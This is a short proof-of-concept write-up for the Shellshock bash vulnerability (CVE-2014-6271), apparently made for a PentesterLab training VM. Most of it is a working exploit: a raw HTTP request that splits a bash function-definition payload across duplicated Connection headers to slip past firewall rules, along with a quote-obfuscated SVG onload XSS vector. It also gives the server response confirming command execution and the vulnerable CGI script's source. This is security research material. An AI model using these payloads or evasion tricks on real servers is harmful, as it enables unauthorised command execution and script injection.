cve-2014-6271 PoC by using HHP - @irsdl

1. ~~ cve-2014-6271 PoC by Using HTTP Header Pollution (HHP) to Bypass Some Firewall Rules ~~
2. By Soroush Dalili (@irsdl)
3. Based on a vulnerable sample - VM downloadable from http://files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso
4.  
5. Note 1: Space characters are important
6. Note 2: It can hide some other vectors such as "'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' " - just interesting
7. Note 3: Look at the request "<<WHY? Look @ ENV>> " and its response "Look @ ENV >> , <<WHY? & WHY?" - also interesting
8. Note 4: Didn't have any actual live firewall to test this on a live product!!!
9.  
10. [Request:]
11. ------------
12. GET /cgi-bin/status HTTP/1.1
13. HOST: test
14. Connection:
15. ()
16. {<<WHY? Look @ ENV>>
17. abcd: A
18. Connection: &};echo "
19. abcd: B
20. Connection: GoesToResponseBody"'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' "
21. abcd: C
22. Connection: "&echo
23. -e "GoesToResponseHeader\x3a@IRSDL"
24.  
25.  
26. ------------
27.  
28. [Response:]
29. ------------
30. HTTP/1.1 200 OK
31. Date: Fri, 26 Sep 2014 00:51:50 GMT
32. Server: Apache/2.2.21 (Unix) DAV/2
33. GoesToResponseHeader: @IRSDL
34. Content-Type: application/json
35. Content-Length: 859
36.  
37. , GoesToResponseBody<svg onload=alert(1) > ,
38. { "uptime": " 00:51:50 up 12:09, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"}
39.  
40. SERVER_SIGNATURE= HTTP_ABCD=A, B, C UNIQUE_ID=VCS4pn8AAAEAAANqBIIAAACU SERVER_PORT=80 HTTP_HOST=test DOCUMENT_ROOT=/var/www/ SCRIPT_FILENAME=/var/www/cgi-bin/status REQUEST_URI=/cgi-bin/status SCRIPT_NAME=/cgi-bin/status REMOTE_PORT=38403 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin PWD=/var/www/cgi-bin SERVER_ADMIN=louis@pentesterlab.com REMOTE_ADDR=192.168.1.1 SHLVL=1 SERVER_NAME=test SERVER_SOFTWARE=Apache/2.2.21 (Unix) DAV/2 QUERY_STRING= SERVER_ADDR=192.168.1.132 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET HTTP_CONNECTION=() { Look @ ENV >> , <<WHY? & WHY? } _=/usr/bin/env
41.  
42. ------------
43.  
44. [cgi-bin/status source code:]
45. ------------
46. #!/bin/bash
47.  
48. echo "Content-Type: application/json";
49. echo ""
50. echo '{ "uptime": "'`uptime`'", "kernel": "'`uname -a`'"} '
51. # the rest added
52. echo ""
53. echo $(env)
54. ------------